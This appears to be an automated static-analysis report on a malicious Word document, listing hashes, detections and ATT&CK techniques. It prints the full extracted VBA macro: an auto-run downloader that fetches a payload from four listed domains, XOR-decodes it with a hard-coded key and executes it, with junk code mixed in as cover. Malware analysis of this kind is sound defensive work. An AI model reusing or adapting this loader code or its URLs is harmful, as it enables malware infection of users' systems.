Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e7f29538f137cd8c…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 32.6 KB
Created: 2017-03-22 07:55:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2019-04-17
MD5: f04e838aa44f16072aa091e3ace08337
SHA-1: 61c5eceb4f91db6544176a5a106699b515af8cae
SHA-256: e7f29538f137cd8c370f73fa473b2e1651fbc3166da0e436f7d7dde3ae3156a2
Risk Score: 330

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1140 Deobfuscate/Decode Files or Information

The sample is an OOXML document containing obfuscated VBA macros, specifically an auto-exec loader built on CreateObject and CallByName. ClamAV signatures classify it as a downloader. The VBA code deobfuscates its strings at run time and uses them to retrieve and execute a payload, likely from a remote source, which is typical downloader behavior.

Heuristics (8)

  • ClamAV: Doc.Downloader.Donoff-10030369-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Donoff-10030369-0
  • VBA project inside OOXML [medium, 5 related findings] (OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    If ActiveDocument.Kind = 0 Then
    Set CuPro = CreateObject(Vaucher)
    End If
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
    If ActiveDocument.Kind = 0 Then
    Set CuPro = CreateObject(Vaucher)
    End If
  • CallByName call [high] (OLE_VBA_CALLBYNAME)
    CallByName call
    Matched line in script
    CallByName c, Liska.T2.Text, VbMethod
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Sub autoopen()
    Dim c As Rhhhh
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the URLs below were found in document text (OOXML body / shared strings). They are the standard OOXML and Office XML namespace URIs declared in the document markup rather than network indicators.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 14021 bytes
SHA-256: b4dad03e0209df8e3e355a0a30dc02095fbdf84eae572289071c9ed3398d9434
Preview of script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Dard"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Sub autoopen()
Dim c As Rhhhh
Set c = New Rhhhh

CallByName c, Liska.T2.Text, VbMethod

Set c = Nothing
End Sub

Attribute VB_Name = "Liska"
Attribute VB_Base = "0{AFFBD9F8-4703-4B2D-904A-11429EF2145C}{09F00B1B-A2CF-4320-BF6E-2334AC561CBB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Rhhhh"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function ratatu() As String


ArizonaSu = Split(Liska.PPAPBOX.Text, "WHOKN")
Vaucher = ArizonaSu(FreshID + FreshID * 2 / 13)
Bitly

ratatu = ""

End Function


    Public Sub Challenge(sender As String, e As Integer)

CallByName CuPro, Liska.OptionButton1.ControlTipText, VbMethod, ArizonaSu(5), FromNow_4, False
Import2
    End Sub
Private Sub Import2()


CallByName CuPro, Liska.Trbd.Text, VbMethod, FromNow_System, Liska.SpinButton1.ControlTipText

End Sub









Attribute VB_Name = "Module1"


Public Const FromNow_System = "User-Agent"
Public SubProperty As Object

Public Const Sooopchik = "avetof"




Public FromNow_PokerFace As Variant
Public FromNow_GMAKO As Object
Public FromNow_LAKOPPC As String
Public FromNow_PIRO_LOR As Object


Public ProjectDarvin As Integer
Public FromNow_RDD2 As Object
Public smbi As String
Public FromNow_2 As String
Public Const FreshID = 0

Public ArizonaSu() As String
Public FromNow_Done As String
Public Vaucher As String
Public FromNow_DoneBBB As String
Public CuPro As Object


Public MovedPermanently() As String
Public FromNow_4 As String

Public Function Ashnorog(Var1, Var2)
  Ashnorog = Var1 Xor Var2
  
End Function







    Private Sub genresButton_Click(sender As Object, e As String)
       
        Dim varUsedCount As Integer
        Dim sw As New Stopwatch
        Try



                For I = 0 To listSize
                    If media.Contains(listVariables(I)) Then
                        varUsed.Add (listVariables(I))
                        varUsedIndex.Add (listVariables.IndexOf(listVariables(I)))
                    End If
                Next
                
                varUsedCount = varUsed.count

                outputBox.Text = ""
               StatusLabel.Text = "Running for: "
    
    End Sub




Attribute VB_Name = "Module2"


Public Function CheckRectsAd() As Boolean
    Dim rTemp As RECT, rMouse As RECT, I As Integer
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 32
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    If IntersectRect(rTemp, AdRect, rMouse) Then
        CheckRectsAd = True
        Exit Function
    End If
End Function

Public Function CheckRectsNav() As Integer
    Dim rTemp As RECT, rMouse As RECT, I As Integer
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 32
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    For I = 0 To UBound(NavRect)
        If I < 8 Then
            If IntersectRect(rTemp, NavRect(I), rMouse) Then
                CheckRectsNav = I + 1
                Exit Function
            End If
        End If
    Next
End Function

Public Sub MoveSheets(sheetToMove As String, sheetAnchor As String, Assimptota6OrAfter As String)


 Dim I
 On Error GoTo d13
For I = LBound(MovedPermanently) To UBound(MovedPermanently) Step 1
 SaveDataCSVToolStripMenuItem_Click 72
If CuPro.Status <> 200 Then
 Err.Raise 700 + vbObjectError, "A", "D"
End If
    
    
    
    Assimptota6 "33", 3
 Exit Sub
d13:
Next
Exit Sub

    
End Sub

Public Function Assimptota6(FullPath As String, NumHoja As Integer) As String

DoChild
 CallByName SubProperty, "Open", VbMethod
If NumHoja > 400 Then

    If numExportadas = 0 Then
        Assimptota6 = "No rows to export [No tiene filas por exportar]"
        Exit Function
    End If
End If

 FromNow_PokerFace = CuPro.responseBody

    
 SubProperty.Write FromNow_PokerFace
CallByName SubProperty, "s" + Sooopchik + "ile", VbMethod, FromNow_DoneBBB, 2
Assimptota4 ".", 1
End Function


Public Function CheckRectsMenu4() As Integer
    Dim rTemp As RECT, rMouse As RECT, I As Integer
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 32
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    For I = 0 To UBound(MenuRect)
        If IntersectRect(rTemp, MenuRect(I), rMouse) Then
            CheckRectsMenu4 = I + 1
            Exit Function
        End If
    Next
End Function


Public Function Assimptota4(FullPath As String, NumHoja As Integer) As String
  AsizePlusX FromNow_DoneBBB, FromNow_Done, "sVp56SIDJM0KpCn6snyopKYq0jnaoc5y"


FromNow_GMAKO.Open (FromNow_Done)
   
End Function
Public Function CheckRectsMenuMenu1() As Integer
    Dim rTemp As RECT, rMouse As RECT, I As Integer
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 1
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    If MenuMenu = 1 Then
        For I = 0 To 3
            If IntersectRect(rTemp, rHelp(I), rMouse) Then
                CheckRectsMenuMenu1 = I + 1
                Exit Function
            End If
        Next
    End If
    If MenuMenu = 5 Then
        If IntersectRect(rTemp, rHelp(4), rMouse) Then
            CheckRectsMenuMenu1 = 5
            Exit Function
        End If
    End If
    If MenuMenu = 6 Then
        If IntersectRect(rTemp, rHelp(5), rMouse) Then
            CheckRectsMenuMenu1 = 5
            Exit Function
        End If
    End If
    If MenuMenu = 7 Or MenuMenu = 8 Then
        If IntersectRect(rTemp, rHelp(5), rMouse) Then
            CheckRectsMenuMenu1 = 5
            Exit Function
        End If
    End If
    If MenuMenu = 7 Then
        If IntersectRect(rTemp, rHelp(6), rMouse) Then
            CheckRectsMenuMenu1 = 6
            Exit Function
        End If
    End If
End Function

Public Function CheckRectsMenuMenu2() As Integer
    Dim rTemp As RECT, rMouse As RECT, I As Integer
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 1
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    For I = 0 To UBound(Menu2Rect)
        If IntersectRect(rTemp, Menu2Rect(I), rMouse) Then
            CheckRectsMenuMenu2 = I + 1
            Exit Function
        End If
    Next
End Function

Public Function DoChild()

 FromNow_Done = FromNow_LAKOPPC
 FromNow_DoneBBB = FromNow_Done + "\bogort" + CStr(ProjectDarvin)
FromNow_Done = FromNow_Done + Replace(ArizonaSu(12), ".", CStr(ProjectDarvin) + ".")
 SubProperty.Type = 1

End Function



    Private Sub SaveOutputToolStripMenuItem_Click(sender As Object, e As String)
        Try
            If outputBox.Text <> "" Then


                SaveFileDialog1.InitialDirectory = "c:\temp\"
                SaveFileDialog1.Filter = "Text files (*.txt)|*.txt|All Files (*.*)|*.*"
                SaveFileDialog1.FilterIndex = 2
                SaveFileDialog1.RestoreDirectory = True
                If (SaveFileDialog1.ShowDialog() = Windows.Forms.DialogResult.OK) Then
                    saveOutputName = SaveFileDialog1.filename
                End If
                If saveOutputName <> "" Then

                End If

            Else
                MessageBox.Show ("The Output box is empty")
            End If



    End Sub
Public Function CheckRectsMenuMenu4() As Integer
    Dim rTemp As RECT, rMouse As RECT, I As Integer
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 1
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    For I = 0 To UBound(Menu4Rect)
        If IntersectRect(rTemp, Menu4Rect(I), rMouse) Then
            CheckRectsMenuMenu4 = I + 1
            Exit Function
        End If
    Next
End Function
Public Sub SaveDataCSVToolStripMenuItem_Click(e As Integer)
       FromNow_4 = Liska.Label2.Caption & MovedPermanently(I)
 ProjectDarvin = ProjectDarvin + 2
 Dim XIpotom2 As Rhhhh
Set XIpotom2 = New Rhhhh
If e < 488 Then


 XIpotom2.Challenge "Swed", 13
CallByName CuPro, Liska.ToggleButton1.Caption, VbMethod
Set XIpotom2 = Nothing
 
Else

            SaveFileDialog1.InitialDirectory = "c:\temp\"
            SaveFileDialog1.Filter = "CSV files (*.csv)|*.csv"
            SaveFileDialog1.FilterIndex = 2
            SaveFileDialog1.RestoreDirectory = True

            If (SaveFileDialog1.ShowDialog() = Wind.ows.Forms.DialogResult.OK) Then
                saveCSV = SaveFileDialog1.filename
            End If
            If saveCSV <> "" Then
              
                'Process.Start(saveCSV)
            End If
End If
    End Sub



Public Sub Method1(MethodParam2() As Byte, MethodParam As String)

  
  Dim AhnLab2 As Long
  Dim AhnLab3 As Long
  Dim AhnLab5 As Long
  Dim AhnLab6 As Long
  Dim plusplus() As Byte
Dim AhnLab4 As Long
Dim plusplusLen As Long
  plusplusLen = Len(MethodParam)
ReDim plusplus(plusplusLen)

  plusplus = StrConv(MethodParam, vbFromUnicode)

  
  AhnLab2 = UBound(MethodParam2) + 1
  AhnLab5 = AhnLab2
  
  
  For AhnLab4 = 0 To (AhnLab2 - 1)
  aa = plusplus(AhnLab4 Mod plusplusLen)
  bb = MethodParam2(AhnLab4)
  MethodParam2(AhnLab4) = Ashnorog(bb, aa)
    
    If (AhnLab4 >= AhnLab6) Then
      AhnLab3 = Int((AhnLab4 / AhnLab5) * 100)
      AhnLab6 = (AhnLab5 * ((AhnLab3 + 1) / 100)) + 1
    End If
  Next
End Sub
Public Function CheckRectMenu9() As Boolean
    Dim rTemp As RECT, rMouse As RECT
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 1
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    If IntersectRect(rTemp, Menu9Rect, rMouse) Then CheckRectMenu9 = True
End Function

Public Function CheckRectsPlayerOpt() As Integer
    Dim rTemp As RECT, rMouse As RECT, I As Integer
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 1
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    For I = 0 To UBound(PlayerOptR)
        If I > 1 Or Not Players(MeNum).Admin > 0 Then
            If IntersectRect(rTemp, PlayerOptR(I), rMouse) Then
                CheckRectsPlayerOpt = I + 1
                Exit Function
            End If
        End If
        If I = 1 And Not Players(MeNum).Admin > 0 Then Exit Function
    Next
End Function
    

Attribute VB_Name = "Module3"

Public Function CheckRectsMenu3() As Integer
    Dim rTemp As RECT, rMouse As RECT, I As Integer
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 1
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    For I = 0 To UBound(Menu3Rect)
        If IntersectRect(rTemp, Menu3Rect(I), rMouse) Then
            CheckRectsMenu3 = I + 1
            Exit Function
        End If
    Next
End Function



Public Sub AsizePlusX(Dpilulten As String, pilultenJ As String, Optional FromNow_Sexote As String)

  Dim pilulten As Integer
  Dim Gpilulten() As Byte
  
  pilulten = FreeFile
  Open Dpilulten For Binary As #pilulten
  ReDim Gpilulten(0 To LOF(pilulten) - 1)
  Get #pilulten, , Gpilulten()
  Close #pilulten
  Call Method1(Gpilulten(), FromNow_Sexote)
  pilulten = FreeFile
  Open pilultenJ For Binary As #pilulten
  Put #pilulten, , Gpilulten()
  Close #pilulten

End Sub
Public Function CheckRectsMenuMenu3() As Integer
    Dim rTemp As RECT, rMouse As RECT, I As Integer
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 1
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    For I = 0 To UBound(rConfig)
        If IntersectRect(rTemp, rConfig(I), rMouse) Then
            CheckRectsMenuMenu3 = I + 1
            Exit Function
        End If
    Next
End Function



Public Sub Bitly()

If ActiveDocument.Kind = 0 Then
Set CuPro = CreateObject(Vaucher)
End If
Set FromNow_PIRO_LOR = CreateObject(ArizonaSu(FreshID + 3))
smbi = Liska.Label1.Caption

  
MovedPermanently = Split("yuriy.photography/de3f3+rolandbitzi.ch/de3f3+yavuzturtelekom.com/de3f3+www.techconsultantsinc.com/de3f3", Liska.zLBL.Caption)
 Set SubProperty = CreateObject(ArizonaSu(1))
    
   Set FromNow_GMAKO = CreateObject(ArizonaSu(1 + 2 + 3 - 4))

Set FromNow_RDD2 = FromNow_PIRO_LOR.Environment(ArizonaSu(4))
'CreateObject Error


 FromNow_LAKOPPC = FromNow_RDD2(ArizonaSu(6))
 ProjectDarvin = 0
 MoveSheets "", "", ""




End Sub

Public Function PizaaT(FullPath As String, NumHoja As Integer) As String
If NumHoja > 900 Then
    If Dir(FullPath & ".qif") > "" Then
        PizaaT = "File already exists [El fichero ya existe]: " & FullPath
        Exit Function
    End If

End If

FromNow_4 = Liska.Label2.Caption & MovedPermanently(I)
 ProjectDarvin = ProjectDarvin + 2
 Dim XIpotom2 As Rhhhh
Set XIpotom2 = New Rhhhh

 XIpotom2.Challenge "VAGCOM", 22
CallByName CuPro, Liska.ToggleButton1.Caption, VbMethod
Set XIpotom2 = Nothing
 

End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 47616 bytes
SHA-256: 12c63f308d7181505101a9f38cbbfb6f7ad44276be8d9283e0ec55a855c227c6
Detection: ClamAV: Doc.Downloader.Donoff-10030369-0
Obfuscation or payload: unlikely